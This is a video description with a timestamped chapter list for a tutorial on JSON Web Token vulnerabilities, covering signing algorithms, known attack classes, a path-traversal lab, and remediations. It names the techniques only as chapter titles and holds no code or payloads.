Today, a comprehensive video on vulnerabilities related to JSON Web Tokens (JWT). If you're not familiar with JWTs, don't worry, I explain everything from A to Z in the video, covering what they are, the cryptography used, and known vulnerabilities like JWT header injection allowing for path traversal!
00:00 - Intro
00:18 - What is a JWT? What is JSON?
03:08 - How are JWTs signed? Overview of crypto algorithms
06:49 - Why attackers are interested in JWTs
07:00 - Attack via arbitrary signature acceptance
08:06 - "None" header attack
09:19 - Brute-force secret key attack
12:16 - JWT header injection, differences between JWS and JWE
16:03 - Lab: JWT authentication bypass via header KID path traversal
18:07 - Impacts
19:18 - Remediations
20:45 - Outro!
Thumbnail: @gurvanseveno3498
=[ Social ]=
→ Twitter: / fransosiche
=[ Sources ]=
→ portswigger.net/web-security/jwt
→ book.hacktricks.xyz/pentestin...
→ supertokens.com/blog/what-is-jwt
→ grafikart.fr/tutoriels/json-w...
→ Laluka's Twitter: thelaluka?s=21&t=...
#cybersecurity #JWT #JsonWebToken #vulnerability #web #hacking #pentest #fr
13 июл 2024
